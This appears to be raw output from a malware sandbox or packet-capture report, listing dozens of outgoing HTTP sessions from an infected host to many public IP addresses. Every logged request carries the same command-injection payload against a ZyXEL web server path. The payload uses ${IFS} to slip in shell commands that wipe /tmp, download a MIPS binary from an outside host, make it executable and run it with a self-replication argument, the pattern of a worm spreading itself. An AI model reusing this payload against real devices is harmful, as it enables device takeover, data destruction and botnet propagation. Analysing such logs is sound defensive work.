                                        Mar 31, 2024 09:21:23.932817936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4800192.168.2.234060895.82.206.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932866096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4801192.168.2.2353352221.204.230.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932924032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4802192.168.2.235076214.159.174.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.932961941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4803192.168.2.2345390164.105.205.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933027983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4804192.168.2.2355196202.249.33.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933082104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4805192.168.2.2348464156.138.5.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933130980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4806192.168.2.2360744165.65.250.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933177948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4807192.168.2.2348148150.155.66.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933233976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4808192.168.2.2347988109.236.191.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933320045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4809192.168.2.2358138146.43.142.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933353901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4810192.168.2.2339206187.113.222.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933413029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4811192.168.2.2349726150.15.67.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933456898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4812192.168.2.2339530165.121.32.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933499098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4813192.168.2.2336806130.89.173.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933549881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4814192.168.2.2345746159.200.159.163443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933593988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4815192.168.2.2346042209.53.167.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933665037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4816192.168.2.235112436.181.204.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933693886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4817192.168.2.2351620164.166.218.128443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933739901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4818192.168.2.2352248138.191.102.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933788061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4819192.168.2.235825048.180.209.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933830023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4820192.168.2.2340208211.174.236.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933881044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4821192.168.2.2358838221.217.166.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.933950901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4822192.168.2.234368019.98.89.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934015036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4823192.168.2.235753894.63.88.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934051991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4824192.168.2.2348374190.145.82.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934096098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4825192.168.2.2354634104.247.96.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934159994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4826192.168.2.2354168111.185.113.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934216976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4827192.168.2.2353724170.254.139.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934257030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4828192.168.2.235411871.114.241.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934314966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4829192.168.2.2360686184.46.222.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934376001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4830192.168.2.235304283.250.45.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934434891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4831192.168.2.233399851.74.203.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934499979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4832192.168.2.2349532223.134.167.125443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934536934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4833192.168.2.2345498139.108.13.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934588909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4834192.168.2.234037450.243.85.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934639931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4835192.168.2.2350116120.227.17.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934705973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4836192.168.2.2340438176.236.38.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934746027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4837192.168.2.2337276153.237.200.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934797049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4838192.168.2.2341594171.182.207.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934850931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4839192.168.2.2357018205.128.90.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.934914112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4840192.168.2.235364242.63.254.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935008049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4841192.168.2.233550244.171.247.92443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935055017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4842192.168.2.2360776134.162.89.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935151100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4843192.168.2.234912213.104.2.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935199022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4844192.168.2.2334672175.143.141.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935261965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4845192.168.2.233740814.222.140.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935322046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4846192.168.2.2332966139.234.141.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935384035 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4847192.168.2.2344038174.18.196.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935451031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4848192.168.2.2354494101.10.135.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935506105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4849192.168.2.233649437.191.133.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935580969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4850192.168.2.23415261.237.58.42443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935643911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4851192.168.2.2343346138.43.63.136443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935693979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4852192.168.2.235680839.84.227.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935751915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4853192.168.2.2358556121.38.158.228443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935813904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4854192.168.2.2339308122.77.246.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935859919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4855192.168.2.2333190144.238.159.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935890913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4856192.168.2.235270025.55.168.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.935955048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4857192.168.2.2349708222.143.123.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936039925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4858192.168.2.2342910112.89.149.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936065912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4859192.168.2.2355966192.183.244.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936103106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4860192.168.2.235641284.2.150.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936157942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4861192.168.2.2340350102.67.37.137443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936196089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4862192.168.2.2345042123.132.72.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936252117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4863192.168.2.2335446211.230.221.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936309099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4864192.168.2.233565459.108.4.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936362982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4865192.168.2.2348010166.45.203.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936427116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4866192.168.2.2338558162.104.102.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:23.936463118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4867192.168.2.233324217.175.173.106443
                                        TimestampBytes transferredDirectionData
